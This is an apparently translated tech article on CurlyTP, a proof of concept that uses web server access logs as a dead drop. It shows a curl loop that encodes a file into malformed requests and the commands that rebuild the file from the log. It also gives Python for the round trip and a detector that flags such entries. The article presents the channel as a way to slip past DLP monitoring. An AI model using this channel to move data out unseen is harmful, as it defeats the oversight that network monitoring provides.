Exchanging secret messages through server logs

According to the Wikipedia definition, a dead drop is a tradecraft device used to exchange information or items between people via a secret location. The idea is that the people never meet, yet still exchange information in a way that preserves operational security.

The hiding place must not attract attention. That is why, in the offline world, people tend to use inconspicuous things: a loose brick in a wall, a library book, or a hollow tree.

There are plenty of steganography and encryption tools on the internet, but the very fact of using such a tool attracts attention. Moreover, they may be blocked at the corporate or national level. What can be done?

Developer Ryan Flowers proposed an interesting option: use any web server as the hiding place. If you think about it, what does a web server do? It receives requests, serves files, and writes logs. And it logs every request, even malformed ones!

It turns out that any web server lets you store almost any message in its log. Flowers wondered how to put this to use.

He proposes the following scheme:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it into the log by sending deliberately malformed requests to the server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode -m g.txt.gz g.txt.gz > g.txt.gz.uue
[root@local ~]# IFS=$'\n'; for x in `cat g.txt.gz.uue | sed 's/ /=+=/g'`; do echo curl -s "http://domain.com?transfer?g.txt.gz.uue?$x"; done | sh

To read the file, you perform the same operations in reverse order: decode and unpack the file, then check the hash (the hash itself can safely be sent over an open channel).

Spaces are replaced with =+= so that the URL contains no whitespace. The program, which the author named CurlyTP, uses base64 encoding, just like email attachments. Each request carries the keyword ?transfer? so that the recipient can easily find the relevant lines in the log.

What do we see in the log in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As already mentioned, to recover the secret message you perform the operations in reverse order:

Remote machine:

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12 | awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

The procedure is easy to automate. The md5sum matches, and the contents of the file confirm that everything was decoded correctly.
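The whole round trip from the steps above (gzip, base64 framing, one request per line, extraction from the log, hash check), as an added example written for this article; it is not Flowers' CurlyTP code. The host name, the log timestamps and client address, and the `round_trip` helper are constructed for the demonstration.

```python
import base64, gzip, hashlib, re, textwrap
from urllib.parse import urlsplit

KEYWORD = "transfer"  # marker the recipient greps for, as in the article
# Apache "combined" format, as in the article's log excerpt
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" \d+ \d+')

def encode_requests(name, data, host="http://domain.com", width=60):
    """Sender side: gzip + base64 (what uuencode -m emits), wrap into short
    lines framed like uuencode, and turn each line into one GET request."""
    b64 = base64.b64encode(gzip.compress(data)).decode()
    lines = [f"begin-base64 644 {name}"] + textwrap.wrap(b64, width) + ["===="]
    # spaces become =+= so the header line survives inside the URL
    return [f"{host}?{KEYWORD}?{name}?{l.replace(' ', '=+=')}" for l in lines]

def fake_access_log(urls, client="1.2.3.4"):
    """Constructed sample of what the server writes for each request
    (the article's log format; timestamps and client are made up)."""
    rows = []
    for i, u in enumerate(urls):
        target = (urlsplit(u).path or "/") + "?" + urlsplit(u).query
        rows.append(f'{client} - - [22/Aug/2019:21:12:{i:02d} -0400] '
                    f'"GET {target} HTTP/1.1" 200 4050 "-" "curl/7.29.0"')
    return "\n".join(rows)

def decode_log(log_text, name):
    """Receiver side: select the keyword requests, keep only the 4th
    '?'-field, restore spaces, drop the framing, base64-decode and gunzip."""
    fields = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group(2).split("?")
        if len(parts) >= 4 and parts[1] == KEYWORD and parts[2] == name:
            fields.append(parts[3].replace("=+=", " "))
    if not fields or not fields[0].startswith("begin-base64 "):
        raise ValueError("no framed transfer found in log")
    body = "".join(f for f in fields[1:] if f != "====")
    return gzip.decompress(base64.b64decode(body))

def round_trip(message):
    """Encode, 'send' into a constructed log, recover, and compare md5
    digests the way the article's md5sum step does."""
    name = "g.txt.gz"
    recovered = decode_log(fake_access_log(encode_requests(name, message)), name)
    return recovered, hashlib.md5(recovered).hexdigest() == hashlib.md5(message).hexdigest()
```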

The method is extremely simple. "The purpose of this exercise is to prove that files can be transferred via small, innocuous web requests, and it works on any server with plain-text logs. Essentially, any web server is a dead drop!" writes Flowers.

Of course, the method only works if the recipient has access to the server logs. But such access is provided, for example, by many hosting providers.

How could it be used?

Ryan Flowers says he is not an information security expert and does not intend to compile a list of possible uses for CurlyTP. For him, it is a proof of concept showing that the familiar tools we see every day can be used in an unconventional way.

In fact, this method has a number of advantages over other "hidden" servers such as Digital Dead Drop or PirateBox: it needs no special configuration on the server side and no special protocols, and it will not arouse suspicion in anyone monitoring the traffic. It is unlikely that a SORM or DLP system will scan URLs for compressed text files.
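The claim that nobody inspects URLs for compressed payloads is worth testing from the log owner's side. As an added example (not from the article or from CurlyTP), the heuristic below scans access-log lines for the framing the article's log excerpt shows (`begin-base64`, `====`, long base64-only query segments) and counts hits per client; the sample log is constructed from the article's lines plus made-up ordinary traffic.

```python
import re
from collections import Counter

# Apache "combined" format, as in the article's excerpt
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) HTTP/[\d.]+" (\d+)')
# a query segment made only of base64 characters and at least 40 long
B64_LINE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")

def looks_like_drop(target):
    """True when the last '?'-separated segment of the request target is a
    uuencode -m framing line (begin-base64 ... / ====) or a long base64-only
    chunk. Ordinary key=value queries (?q=dead+drop&page=2) fail both checks.
    Long hex or base64 session tokens also match, so tune min_hits below."""
    if "?" not in target:
        return False
    seg = target.rsplit("?", 1)[1].replace("=+=", " ")
    return seg.startswith("begin-base64 ") or seg == "====" or bool(B64_LINE.match(seg))

def drop_candidates(log_text, min_hits=3):
    """Count payload-looking requests per client IP and return the clients
    that reach min_hits; a single odd request is noise, a burst is a signal."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and looks_like_drop(m.group(2)):
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}

# Constructed sample: the article's three log lines, a trailer line, and two
# ordinary requests from a second client that must not be flagged.
SAMPLE_LOG = "\n".join([
    '1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:04 -0400] "GET /?transfer?g.gz.uue?==== HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '5.6.7.8 - - [22/Aug/2019:21:12:02 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '5.6.7.8 - - [22/Aug/2019:21:12:05 -0400] "GET /search?q=dead+drop&page=2 HTTP/1.1" 200 567 "-" "Mozilla/5.0"',
])
```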

This is one way to pass messages through service files. You may recall how some forward-thinking companies used to place developer job postings in HTTP headers or in the HTML code of their pages.


The idea was that only web developers would see the Easter egg, since an ordinary visitor does not look at headers or HTML source.


Source: www.habr.com
